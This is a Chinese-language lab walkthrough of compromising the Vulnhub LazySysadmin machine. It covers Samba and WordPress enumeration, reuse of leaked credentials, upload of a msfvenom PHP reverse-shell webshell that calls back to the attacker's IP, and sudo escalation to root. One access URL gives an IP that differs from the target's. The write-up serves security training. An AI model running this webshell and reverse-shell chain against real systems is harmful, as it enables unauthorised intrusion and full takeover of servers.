文章目录
环境准备
本次环境使用的是vulnhub靶场里面的Lazysysadmin
靶场地址:https://www.vulnhub.com/entry/lazysysadmin-1,205/
靶机ip :192.168.0.103
攻击机 parrot 192.168.146.129
一、服务器信息搜集
nmap -sV 192.168.0.103
发现开放了samba服务并尝试连接
smbclient -L 192.168.0.103
👆发三个文件,除了自带的两个-->还有share$
print$ 共享驱动
IPC$ 共享空连接,不需要用户名就能登录的web服务器
share$ 共享文件夹
所以尝试连接——密码使用空口令登录
smbclient '\\192.168.0.103\share$'
使用get命令分别下载其文件并查看
↑发现某个password密码为12345,先记录下来备用
先前smb里的wordpress需要重点留意
WordPress是内容管理系统(CMS)来使用的其中一种
cd wordpress
找到wp-config.php是数据库连接配置文件,并用get命令将文件下载下来查看
配置文件里发现了数据库信息
数据库用户名和密码泄露,记录其信息备用
二、网站信息搜集
1.dirb目录扫描
dirb是一个基于字典的web目录扫描工具,是信息搜集常用的工具
dirb http://192.168.0.103
2.浏览网站——尝试登录后台
👆用之前的数据库泄露的用户名和密码登录试试看
- Admin
- TogieMYSQL12345^^
ps:这么想是因为可能站长的数据库和后台登录设置的是同一个用户登录(没有考虑到密码策略安全)
思路+1
成功进入后台😄O(∩_∩)O
三、后台上传点上传webshell
在Appearance找到theme的404界面作为上传点
四、The Metasploit Framework的使用
1.msf生成php的木马
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.146.129 lport=4444 -f raw > /home/cj/shell.php
2.建立木马监听端
msfconsole
use /exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.146.129
set lport 4444
run
将生成好的shell.php内容复制粘贴到404界面的编辑器里并且上传
找路径访问——木马上线
然后访问http://192.168.3.153/wordpress/wp-content/themes/twentyfifteen/404.php
之前信息收集阶段dirb扫出来的
成功上线
执行shell,
用python修改美化命令行界面
shell
python -c 'import pty;pty.spawn("/bin/bash")'
查看一下账户信息,并发现togie这个用户
cat /etc/passwd
五、提权
su togie
使用先去搜集到的密码:12345
登录成功
sudo -l 显示出自己(执行 sudo 的使用者)的权限
sudo su (三个all直接sudo su到root权限)
sudo -l
sudo su
cd ~
ls
cat proof.txt
三个all
😄O(∩_∩)O完成,成功拿下目标靶机